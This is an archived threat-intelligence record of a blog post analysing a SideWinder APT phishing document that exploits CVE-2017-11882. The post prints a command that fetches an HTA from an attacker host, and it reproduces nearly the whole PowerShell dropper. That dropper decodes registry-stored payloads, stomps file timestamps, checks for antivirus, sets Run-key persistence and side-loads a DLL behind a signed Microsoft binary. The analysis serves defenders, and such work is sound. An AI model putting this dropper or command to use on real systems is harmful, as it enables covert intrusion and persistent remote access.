{
	"id": "70041452-8673-48f2-bb33-d3690b5dc1b8",
	"created_at": "2026-04-06T00:08:07.795219Z",
	"updated_at": "2026-04-10T03:37:20.298451Z",
	"deleted_at": null,
	"sha1_hash": "26c00470bdfb728522161a5cf595371a5c1b43cc",
	"title": "APT Sidewinder: Tricks powershell, Anti Forensics and execution side loading",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 998796,
	"plain_text": "APT Sidewinder: Tricks powershell, Anti Forensics and execution side\r\nloading\r\nBy Sebdraven\r\nPublished: 2018-07-17 · Archived: 2026-04-05 16:52:24 UTC\r\nSpear phishing\r\nI’ve started few days ago an analysis on a RTF following my recent researches.\r\nI found it this: 892859ea9d86fc441b24222148db52eb33cd106c2ac68eafbe83ab0064215488\r\nI execute rtfobj on it and two ole embedded objects malforfed:\r\nPress enter or click to view image in full size\r\nBut rtfobj extracts succeffully two raws objects:\r\nPress enter or click to view image in full size\r\nThe object 6A2A1 is very interesting:\r\nPress enter or click to view image in full size\r\nand this one:\r\nPress enter or click to view image in full size\r\nIn fact, the ole object is a exploit of CVE-2017–11882.\r\nThe implementation is a bit different than my last article, there is not an object MTF.\r\nThe implementation has many matching with the public exploit: https://github.com/0x09AL/CVE-2017-11882-metasploit\r\nThe exploitation is the following:\r\nan hta is downloaded here and lauched by msthll.dll.RunHMLApplication.\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 1 of 7\n\ncaller.exe hxxp://www.google.com.d-dns.co/includes/686a0ea5/-1/1223/da897db0/final.hta\r\nThe hta is a mix of powershell, vbscript and javascript.\r\nInstallation of payload and Persistance\r\nThe installation of the payload made by vscript a line 151\r\nobjWSS.RegWrite “HK”\u0026”CU\\Softwa”\u0026”re\\Updater\\pa”\u0026”rt3\", bnm, “REG_SZ”\r\nhere\r\ntst = getProfile(“0”) \u0026 “$c=”””\u0026c\u0026”””;$m=”””\u0026m\u0026”””;”\u0026\r\nBase64Decode(objWSS.RegRead(“HKEY_CURRENT_USER\\Softwa”\u0026”re\\Updater\\pa”\u0026”rt3\")) \u0026 getProfile(“1”)\r\nobjWSS.run “powershell.exe -ExecutionPolicy Bypass -Command “”” \u0026 tst \u0026 “”””, 0, true\r\nand here:\r\nobjWSS.RegWrite “HKCU\\Software\\Updater”, “”\r\nobjWSS.RegWrite “HKCU\\Software\\Updater\\part1”, p1, “REG_SZ”\r\nobjWSS.RegWrite “HKCU\\Software\\Updater\\part2”, p2, “REG_SZ”\r\nThe registry is used like pivot.\r\np1, p2 and bnm are three blobs of base64 data.\r\nbdm decoded is:\r\niex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“””U2V0LUV4ZWN1dGlvblBvbGljeSAtRXhlY3V0aW9uUG9s\r\nThere is a new base64 block decoded:\r\nSet-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser -Force;\r\n$ErrorActionPreference=’SilentlyContinue’;\r\n$pname36 = “3” + “60Tr” + “ay”\r\n$binDir = [Environment]::GetFolderPath([Enum]::ToObject([System.Environment+SpecialFolder], 35))+ “\\” +\r\n“Winset\\Config” + “\\”;\r\n$bin = “Winset.exe”;\r\ntry{\r\n$cmdLine = ([int]$c).toString(“00000000”)+([int]$m).toString(“00000000”);\r\n$cmdLine = $bin+ “ “ +$cmdLine;\r\n}\r\ncatch{\r\n$cmdLine = $bin;\r\n}\r\n$line = new-object byte[] 64;\r\n$buf6 =[Byte[]] (,0x23 * 64);\r\n$cbytes = [system.Text.Encoding]::ASCII.GetBytes($cmdLine);\r\n[array]::copy($cbytes,$line,$cbytes.length);\r\n$binPath = $binDir + $bin;\r\n$binPathdll = $binDir + “cmpbk32.dll”;\r\n$dmybinPath = $binDir + “cmdl32.exe”;\r\n$rpcdllpath = $binDir + “57146C96.dll”;\r\n$run = ‘HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\’;\r\n$system = ‘HKCU:Software\\Updater’;\r\n$runExists = False;\r\n$pnameavr = “av” + “gn” + “t”;\r\n$msvbvmdllpath = $env:WINDIR + “\\system32\\msvbvm60.dll”\r\n$cmdl32path = $env:WINDIR + “\\system32\\cmdl32.exe”\r\n$q36 = Get-Process $pname36 -ErrorAction SilentlyContinue;\r\nif($q36){\r\nexit\r\n}\r\nfunction dc($s){\r\nsal n New-Object;\r\n$data = [System.Convert]::FromBase64String(“H4sIAAAAAAA” + $s);\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 2 of 7\n\n$ms = n System.IO.MemoryStream;\r\n$ms.Write($data, 0, $data.Length);\r\n$ms.Seek(0,0) | Out-Null;\r\nreturn (n System.IO.StreamReader(n System.IO.Compression.GZipStream($ms,\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n};\r\nfunction updt($t, $b){\r\n(ls $t).LastWriteTime = (ls $b).LastWriteTime\r\n(ls $t).CreationTime = (ls $b).CreationTime\r\n(ls $t).LastAccessTime = (ls $b).LastAccessTime\r\n}\r\nfunction wb64($path, $b64){\r\n$bytes = [System.Convert]::FromBase64String(“TVq” + $b64);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($path,$bytes) | Out-Null;\r\nupdt -t $path -b $cmdl32path\r\n}\r\nfunction sb($h, $n ) {\r\n$len = $n.length;\r\n$limit = $h.length — $len;\r\nFor( $i = 0; $i -le $limit; $i++ ) {\r\n$k = 0;\r\nFor( ; $k -lt $len; $k++ ) {\r\nif( $n[$k] -ne $h[$i+$k] ) {break};\r\n}\r\nif( $k -eq $len ){return $i};\r\n}\r\nreturn -1;\r\n}\r\nif((Test-Path $env:WINDIR\\SysWOW64)){\r\n$msvbvmdllpath = $env:WINDIR + “\\SysWOW64\\msvbvm60.dll”\r\n$cmdl32path = $env:WINDIR + “\\SysWOW64\\cmdl32.exe”\r\n}\r\ntry{\r\nif(!(Test-Path $binPath)){\r\n$b64 = dc -s ((Get-ItemProperty -Path $system).part1);\r\n$bytes = [System.Convert]::FromBase64String(“TVq” + $b64);\r\n$rn = [System.BitConverter]::GetBytes((Get-Random -Maximum 9999 -Minimum 1111))[0..1];\r\n[array]::copy($rn,0,$bytes,$bytes.length — 2,2);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPath,$bytes) | Out-Null;\r\nupdt -t $binPath -b $cmdl32path\r\n$b64dll = dc -s ((Get-ItemProperty -Path $system).part2);\r\n$bytes = [System.Convert]::FromBase64String(“TVq” + $b64dll);\r\n[array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPathdll,$bytes) | Out-Null;\r\nupdt -t $binPathdll -b $cmdl32path\r\n}\r\nRemove-Item -Path $system | Out-Null;\r\nRemove-Item $PROFILE.CurrentUserAllHosts | Out-Null;\r\nNew-ItemProperty -Path $run -Name “Winsound” -PropertyType String -Value $dmybinPath | Out-Null;\r\nCopy-Item $msvbvmdllpath $rpcdllpath\r\nupdt -t $rpcdllpath -b $msvbvmdllpath\r\nCopy-Item $cmdl32path $dmybinPath\r\nupdt -t $dmybinPath -b $cmdl32path\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 3 of 7\n\n$avr = Get-Process $pnameavr -ErrorAction SilentlyContinue\r\nif (!$avr) {\r\n\u0026($dmybinPath) | Out-Null;\r\n}\r\nExit\r\n}\r\ncatch {\r\n$_.Exception.Message | Out-Null;\r\n}\r\nThis powershell checks if the AV 360 is installed:\r\n$pname36 = “3” + “60Tr” + “ay”\r\n$q36 = Get-Process $pname36 -ErrorAction SilentlyContinue;\r\nif($q36){\r\nexit\r\n}\r\nWe can imagine the attackers were made a recon step before.\r\nThe folder where the loadin chain is:\r\n$binDir = [Environment]::GetFolderPath([Enum]::ToObject([System.Environment+SpecialFolder], 35))+ “\\” +\r\n“Winset\\Config” + “\\”;\r\nThe powershell copies:\r\n$msvbvmdllpath = $env:WINDIR + “\\system32\\msvbvm60.dll”\r\n$cmdl32path = $env:WINDIR + “\\system32\\cmdl32.exe”\r\nCopy-Item $cmdl32path $dmybinPath\r\nCopy-Item $msvbvmdllpath $rpcdllpath\r\nSo msvbvm60.dll becomes: 57146C96.dll\r\nAnd Winset.exe and cmpbk32.dll are decoded and copied in the same folder.\r\npart1 and part2 is the reg key base here $system = ‘HKCU:Software\\Updater’;:\r\nobjWSS.RegWrite “HKCU\\Software\\Updater”, “”\r\nobjWSS.RegWrite “HKCU\\Software\\Updater\\part1”, p1, “REG_SZ”\r\nobjWSS.RegWrite “HKCU\\Software\\Updater\\part2”, p2, “REG_SZ”\r\npart1 is big blob of base64 data.\r\nFirstly the registry key is retrieve:\r\n(Get-ItemProperty -Path $system).part1\r\nGet Sebdraven’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nafter is the function dc is called.\r\nfunction dc($s){\r\nsal n New-Object;\r\n$data = [System.Convert]::FromBase64String(“H4sIAAAAAAA” + $s);\r\n$ms = n System.IO.MemoryStream;\r\n$ms.Write($data, 0, $data.Length);\r\n$ms.Seek(0,0) | Out-Null;\r\nreturn (n System.IO.StreamReader(n System.IO.Compression.GZipStream($ms,\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n};\r\nthis string “H4sIAAAAAAA” is added at part2 and the data is decoded an\r\n$data = [System.Convert]::FromBase64String(“H4sIAAAAAAA” + $s);\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 4 of 7\n\nand unzip:\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n};\r\nand the Mz header in base64 is added and decoded:\r\n$bytes = [System.Convert]::FromBase64String(“TVq” + $b64);\r\nand the executable is modified for the last time and copied in $binDir:\r\n$bytes = [System.Convert]::FromBase64String(“TVq” + $b64);\r\n$rn = [System.BitConverter]::GetBytes((Get-Random -Maximum 9999 -Minimum 1111))[0..1];\r\n[array]::copy($rn,0,$bytes,$bytes.length — 2,2);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPath,$bytes) | Out-Null;\r\nThe dll is decoded, modified and written on disk in the same way:\r\n$b64dll = dc -s ((Get-ItemProperty -Path $system).part2);\r\n$bytes = [System.Convert]::FromBase64String(“TVq” + $b64dll);\r\n[array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64);\r\nNew-Item -ItemType Directory -Force -Path $binDir | Out-Null;\r\n[io.file]::WriteAllBytes($binPathdll,$bytes) | Out-Null;\r\nupdt -t $binPathdll -b $cmdl32path\r\nThe Trick very important here is : [array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64); to modify the dll.\r\nIf you decode the before the modification you have a dll truncated.\r\nbefore:\r\nPress enter or click to view image in full size\r\nafter:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 5 of 7\n\nIn fact:\r\nThe powershell modify the dll to add $lines\r\nand $lines\r\n$line = new-object byte[] 64;\r\n$buf6 =[Byte[]] (,0x23 * 64);\r\n$cbytes = [system.Text.Encoding]::ASCII.GetBytes($cmdLine);\r\n[array]::copy($cbytes,$line,$cbytes.length);\r\nand $cmdLine\r\n$bin =Winset.exe\r\n$cmdLine = ([int]$c).toString(“00000000”)+([int]$m).toString(“00000000”);\r\n$cmdLine = $bin+ “ “ +$cmdLine;\r\n}\r\nlike in the dll: .string “Winset.exe -0000000100001223\r\nSo we have in the same folder: Winset\\Config\r\nWinset.exe (part1 modified and decoded)is a fake Windows Security Configuration Editor Command Tool\r\ncmpbk32.dll (part2 modified and decoded)\r\n57146C96.dll (vb virtual machine)\r\ncmdl32.exe (executable of windows)\r\nThe powershell change timestamps of files copied:\r\nupdt -t $binPathdll -b $cmdl32path\r\nupdt -t $binPath -b $cmdl32path\r\nfunction updt($t, $b){\r\n(ls $t).LastWriteTime = (ls $b).LastWriteTime\r\n(ls $t).CreationTime = (ls $b).CreationTime\r\n(ls $t).LastAccessTime = (ls $b).LastAccessTime\r\n}\r\nPersistance\r\nThe persistant is a hkey run very basic with the path of the dll in parameter:\r\n$run = ‘HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\’;\r\nNew-ItemProperty -Path $run -Name “Winsound” -PropertyType String -Value $dmybinPath | Out-Null;\r\nTo reload cmpbk32.dll at each reboot of the system and execute the dllmain of the dll.\r\nLoading Chain\r\nThe powershell launch cmdl32.exe (“Connection Manager Phonebook Downloader”) trusted by AV because it’s develloped\r\nby Microsoft.\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 6 of 7\n\nthis exe used: cmpbk32.dll\r\nSo when cmdl32.exe is launched cmpbk32.dll is loaded. (in the same directory, side loading)\r\nthe entrypoint is exectuted.\r\nThe important part is:\r\nPress enter or click to view image in full size\r\nThe function sub.Winset.exe__0000000100001223_0 launches Winset.exe the real RAT like this “Winset.exe\r\n-0000000100001223” ; len=2\r\nSource: https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nhttps://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c"
	],
	"report_names": [
		"apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c"
	],
	"threat_actors": [
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434087,
	"ts_updated_at": 1775792240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/26c00470bdfb728522161a5cf595371a5c1b43cc.pdf",
		"text": "https://archive.orkl.eu/26c00470bdfb728522161a5cf595371a5c1b43cc.txt",
		"img": "https://archive.orkl.eu/26c00470bdfb728522161a5cf595371a5c1b43cc.jpg"
	}
}